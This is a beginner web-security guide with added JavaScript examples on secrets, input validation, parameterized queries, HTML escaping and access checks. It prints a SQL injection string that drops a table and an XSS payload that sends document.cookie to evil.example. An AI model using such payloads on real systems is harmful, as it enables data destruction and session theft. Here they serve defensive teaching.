Security Basics for Vibe Coders
You don’t need to be a security expert, but you DO need to avoid common mistakes.
AI can help write secure code—if you know what to ask for.
The Golden Rules
1. Never Put Secrets in Code
Bad:
const API_KEY = "sk_live_abc123xyz789"; // ❌ NEVER DO THIS
Good:
const API_KEY = process.env.API_KEY; // ✅ Load from environment
Why: Anything you commit stays in the repository history even after you delete it from the code. Bots scan public GitHub for leaked keys within minutes of a push, and private repos leak too: a fork made public, a mistaken visibility change, a compromised account. If a key does get committed, revoke it and issue a new one; removing it from the code is not enough.
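Loading one variable is the easy part; the mistakes happen around it (a forgotten variable, a placeholder copied from an example file, a secret echoed into a log). The following is an added example, not code from the original guide: a small config loader that reads the variables the .env section below defines from process.env (or from any object you hand it, which is how it is tested), fails at startup when one is missing, and produces a log-safe view. How the .env file reaches process.env (your host, `node --env-file=.env`, the dotenv package) is outside this snippet; the placeholder list is an assumption for the demo.

```javascript
// Added example, not from the original guide. Reads DATABASE_URL, API_KEY and
// SECRET_KEY from process.env or from any object passed in for testing.

const REQUIRED = ['DATABASE_URL', 'API_KEY', 'SECRET_KEY'];

// Values that mean "someone forgot to set this": empty, or copied from an
// example file. Assumed list for the demo; extend it with your own samples.
const PLACEHOLDERS = new Set(['', 'changeme', 'super_secret_key_here', 'sk_live_abc123xyz789']);

function loadConfig(env = process.env) {
  const missing = REQUIRED.filter((name) => !(name in env) || PLACEHOLDERS.has(env[name]));
  if (missing.length > 0) {
    // Name the variables, never echo their values: this message may end up in a log.
    throw new Error(`missing or placeholder environment variables: ${missing.join(', ')}`);
  }
  return {
    databaseUrl: env.DATABASE_URL,
    apiKey: env.API_KEY,
    secretKey: env.SECRET_KEY,
    // Non-secret settings get explicit defaults so behaviour is predictable.
    port: Number(env.PORT ?? 3000),
  };
}

// Strip the password from a connection URL so it can be logged safely.
function redactUrl(raw) {
  const url = new URL(raw);
  if (url.password) url.password = '***';
  return url.toString();
}

// A log-safe view of the config: proves each secret is present without showing it.
function describeForLog(config) {
  const present = (value) => `set (${value.length} chars)`;
  return {
    databaseUrl: redactUrl(config.databaseUrl),
    apiKey: present(config.apiKey),
    secretKey: present(config.secretKey),
    port: config.port,
  };
}
```

Call `loadConfig()` once at startup and pass the result around; if it throws, the deploy fails loudly with the variable names and nothing else. Log `describeForLog(config)` rather than the config object itself.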
2. Always Use HTTPS
The 🔒 in your browser URL means the connection is encrypted and the server's identity has been checked.
HTTP: Data travels in plain text (readable, and modifiable, by anyone on the path: the coffee-shop Wi-Fi, the ISP, a compromised router).
HTTPS: Data is encrypted and authenticated (only your browser and the real server can read or alter it).
For your apps: Modern hosting (Vercel, Netlify) includes HTTPS automatically; check that a plain http:// URL redirects to https://. If you run your own server, get a free certificate from Let's Encrypt and set up that redirect yourself.
3. Validate All User Input
Never trust data from users. Ever. That includes form fields, URL parameters, headers, cookies and uploaded files: anything that arrives over the network can contain anything.
Example attack: “SQL Injection”
User enters in the name field:
Robert'); DROP TABLE users;--
If your backend pastes that text straight into a SQL string, the quote and closing parenthesis end your original statement early, a second command follows, and the -- turns whatever remained of your query into a comment. Result: the users table is gone.
Validation helps (a name field has no business containing semicolons), but the real fix is to never build SQL from strings: use parameterized queries, where the database receives the query and the user's value separately.
What to tell AI:
“Add input validation to all form fields (type, length, format). Use parameterized queries for every database call and never build SQL by string concatenation.”
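Here is what those two instructions look like side by side, as an added example that is not part of the original guide. It validates the name field, then builds the same INSERT the vulnerable way and the parameterized way. It assumes a Postgres-style driver that accepts an object of the form { text, values } with $1 placeholders (the `pg` package does); no database is contacted, and the small statement counter exists only to show how many commands a database would see in each string.

```javascript
// Added example, not from the original guide. No database is contacted; the
// functions only build the query. Assumes a driver that takes { text, values }.

// The injection payload from the text, used as a constructed sample input.
const BOBBY = "Robert'); DROP TABLE users;--";

// Step 1: validate the field against what it is supposed to hold. This keeps
// junk out of the database and shrinks the attack surface, but validation is
// not the defence against SQL injection: "O'Brien" is a valid name and still
// breaks a concatenated query.
function validateName(input) {
  if (typeof input !== 'string') return { ok: false, error: 'name must be a string' };
  const name = input.trim();
  if (name.length < 1 || name.length > 50) return { ok: false, error: 'name must be 1-50 characters' };
  // Letters in any script, combining marks, spaces, apostrophes and hyphens.
  if (!/^[\p{L}\p{M}' -]+$/u.test(name)) return { ok: false, error: 'name contains unsupported characters' };
  return { ok: true, value: name };
}

// Step 2, vulnerable version: the user's text becomes part of the SQL program.
function createUserUnsafe(name) {
  return `INSERT INTO users (name) VALUES ('${name}')`;
}

// Step 2, safe version: the SQL text is fixed and the value travels separately.
// The database never parses the value, so quotes and semicolons in it are inert.
function createUserSafe(name) {
  return { text: 'INSERT INTO users (name) VALUES ($1)', values: [name] };
}

// Demo helper: count the statements a database would see in a SQL string,
// honouring single-quoted strings ('' is an escaped quote) and -- comments.
function countStatements(sql) {
  let count = 0;
  let inString = false;
  let sawCode = false; // non-whitespace seen since the last ';'
  for (let i = 0; i < sql.length; i++) {
    const ch = sql[i];
    if (inString) {
      if (ch === "'") {
        if (sql[i + 1] === "'") i++; // doubled quote stays inside the string
        else inString = false;
      }
      continue;
    }
    if (ch === "'") { inString = true; sawCode = true; continue; }
    if (ch === '-' && sql[i + 1] === '-') break; // comment runs to end of line
    if (ch === ';') { if (sawCode) count++; sawCode = false; continue; }
    if (!/\s/.test(ch)) sawCode = true;
  }
  return sawCode ? count + 1 : count;
}
```

`countStatements(createUserUnsafe(BOBBY))` is 2: the INSERT and a DROP TABLE. The parameterized version is always exactly one statement, whatever the value contains, and "O'Brien" works instead of producing a syntax error.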
4. Use Authentication Libraries
Don’t build login systems from scratch. Password storage, session handling, password reset and OAuth each have subtle failure modes that the libraries below have already worked through.
Good options:
- NextAuth.js (for Next.js apps)
- Clerk
- Auth0
- Supabase Auth
What to tell AI:
“Implement authentication using [library]. Include email/password login and Google OAuth.”
Common Threats (Simplified)
Cross-Site Scripting (XSS)
What: Attacker submits text (a comment, a profile name) containing HTML or JavaScript that then runs in other users’ browsers, with those users’ sessions.
Prevention: Escape user content at the point where it is written into HTML. Frameworks like React do this by default; the holes are raw HTML sinks such as innerHTML and dangerouslySetInnerHTML.
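As an added example (not from the original guide), the escaping step written out in plain JavaScript, which runs in Node or a browser. The attacker's "display name" is constructed for the demo; if a page rendered it raw, the onerror handler would run in every visitor's browser. The profile template is hypothetical.

```javascript
// Added example, not from the original guide.

// Constructed attacker payload: a display name that is really an <img> tag with
// an event handler. document.cookie is just text here; in a browser it would run.
const EVIL_NAME = '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">';

// The five characters with special meaning in HTML text and in quoted attribute
// values. Escape at output time, not when storing, so the same stored value can
// still be used safely in an email or a JSON API.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the template pastes the value into markup. Equivalent to
// element.innerHTML = ... in the browser, or dangerouslySetInnerHTML in React.
function renderProfileUnsafe(user) {
  return `<h1>Hello, ${user.name}</h1>`;
}

// Safe: every untrusted value passes through escapeHtml. The browser shows the
// attacker's text literally and never sees a tag.
function renderProfileSafe(user) {
  return `<h1>Hello, ${escapeHtml(user.name)}</h1>`;
}
```

Escaping covers HTML text and quoted attribute values only. Putting user data inside a `<script>` block, an inline event handler, or an `href` that starts with `javascript:` is unsafe even after escaping; use `textContent` instead of `innerHTML` in the browser, and treat `dangerouslySetInnerHTML`, `v-html` and friends as the exceptions that need a review.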
SQL Injection
What: Attacker manipulates database queries through input fields.
Prevention: Use parameterized queries. ORMs and query builders (Prisma, Drizzle, Knex) do this for you; the risk returns the moment you build a raw query by concatenating strings.
Broken Authentication
What: Weak passwords, sessions that leak or never expire, no limit on login attempts.
Prevention: Use an established auth library, require a minimum password length and reject known-breached passwords, rate-limit login attempts, and offer multi-factor authentication where the library supports it.
Exposed Sensitive Data
What: Returning whole database rows (password hashes, tokens, other users’ emails) from an API, or printing them in logs and error pages.
Prevention: Return an explicit allowlist of fields, check that the caller owns the resource before returning anything, and keep secrets out of logs.
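The ownership check and the allowlist together, as an added example that is not part of the original guide. It is the shape of handler the "Secure this API endpoint" prompt later on this page should produce, written framework-agnostically: the route wrapper (Express, a Next.js API route) would pass in the authenticated user id and turn the returned { status, body } into an HTTP response. The orders table, its rows and the field names are constructed for the demo.

```javascript
// Added example, not from the original guide. In-memory stand-in for a table.

// Constructed sample rows, shaped like what an orders table accumulates over time.
const ORDERS = new Map([
  [100, {
    id: 100, userId: 1, status: 'shipped', total: 4999,
    items: [{ sku: 'MUG-1', qty: 2 }],
    paymentToken: 'tok_constructed_abc',    // must never leave the server
    internalNotes: 'customer called twice', // staff-only
    fraudScore: 0.02,
  }],
  [101, {
    id: 101, userId: 2, status: 'pending', total: 1500,
    items: [{ sku: 'PEN-7', qty: 1 }],
    paymentToken: 'tok_constructed_def', internalNotes: '', fraudScore: 0.6,
  }],
]);

// Allowlist, not denylist: pick the fields the client needs. A column added to
// the table later (say, a refund reason) stays private by default. With a
// denylist (`delete order.paymentToken`) every new column leaks until someone
// remembers to add it.
function toCustomerView(order) {
  const { id, status, total, items } = order;
  return { id, status, total, items };
}

// authenticatedUserId comes from the session, never from the request body.
// orderId comes from the URL and is untrusted text until parsed.
function getOrder(authenticatedUserId, orderId) {
  if (authenticatedUserId == null) {
    return { status: 401, body: { error: 'authentication required' } };
  }
  const id = Number(orderId);
  if (!Number.isInteger(id) || id <= 0) {
    return { status: 404, body: { error: 'not found' } };
  }
  const order = ORDERS.get(id);
  // Same response for "does not exist" and "not yours": a 403 would confirm
  // to a curious user that the order ids they are guessing are real.
  if (!order || order.userId !== authenticatedUserId) {
    return { status: 404, body: { error: 'not found' } };
  }
  return { status: 200, body: toCustomerView(order) };
}
```

The two checks are independent: authentication (401) says who is calling, ownership (404 for anyone else) says whether they may see this row. An endpoint that only has the first check is the classic "change the id in the URL" bug.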
Environment Variables: Your Security Friend
Environment variables keep secrets out of your code.
Creating a .env file
# .env (never commit this file!)
DATABASE_URL=postgresql://user:password@localhost:5432/mydb
API_KEY=sk_live_abc123xyz789
SECRET_KEY=super_secret_key_here
Using in code
// The value comes from .env, not hardcoded
const dbUrl = process.env.DATABASE_URL;
Next.js and most hosts load .env for you; plain Node needs `node --env-file=.env app.js` (Node 20.6 or later) or the dotenv package. Commit a .env.example with the variable names and fake values so collaborators know what to set.
.gitignore (MUST HAVE)
# Never commit these files
.env
.env.local
.env.production
Security Checklist
Before launching any app:
- No hardcoded passwords or API keys
- HTTPS enabled
- User input is validated
- Authentication uses a trusted library
- .env files are in .gitignore
- Database queries are parameterized
- Error messages don’t expose sensitive info
What to Ask AI
When building features that involve security:
For Authentication:
“Implement secure user authentication with password hashing, session management, and rate limiting for login attempts.”
For Forms:
“Add input validation for this form. Validate email format, sanitize text inputs, and limit field lengths.”
For APIs:
“Secure this API endpoint with authentication. Only allow access to users who own this resource.”
For Databases:
“Use parameterized queries for all database operations to prevent SQL injection.”
Common Mistakes to Avoid
| Mistake | Consequence | Fix |
|---|---|---|
| API key in frontend code | Anyone who opens DevTools can read it | Call the third-party API from a backend route that holds the key |
| Weak password rules | Accounts get taken over by guessing | Require a minimum length (8 or more characters, allow long passphrases) and reject known-breached passwords |
| No rate limiting | Brute-force login and credential stuffing | Limit attempts per account and per IP, with a cool-down |
| Trusting user input | Data corruption, injection | Validate everything and use parameterized queries |
| Logging sensitive data | Secrets leak through log storage and error trackers | Never log passwords, keys, tokens or full card numbers |
Anything in the browser bundle is public, including environment variables your framework exposes on purpose (the NEXT_PUBLIC_ prefix in Next.js, VITE_ in Vite). Only values that are meant to be public belong there.
When to Get Help
Security is complex. For serious apps, consider:
- Code review from someone with security experience
- Penetration testing for production apps
- Security audits for apps handling sensitive data (payments, health info)
For personal projects and MVPs: Following this guide covers the basics.
Next Steps
→ AI-Powered IDEs — Start building with security in mind
→ Your First Project — Apply what you’ve learned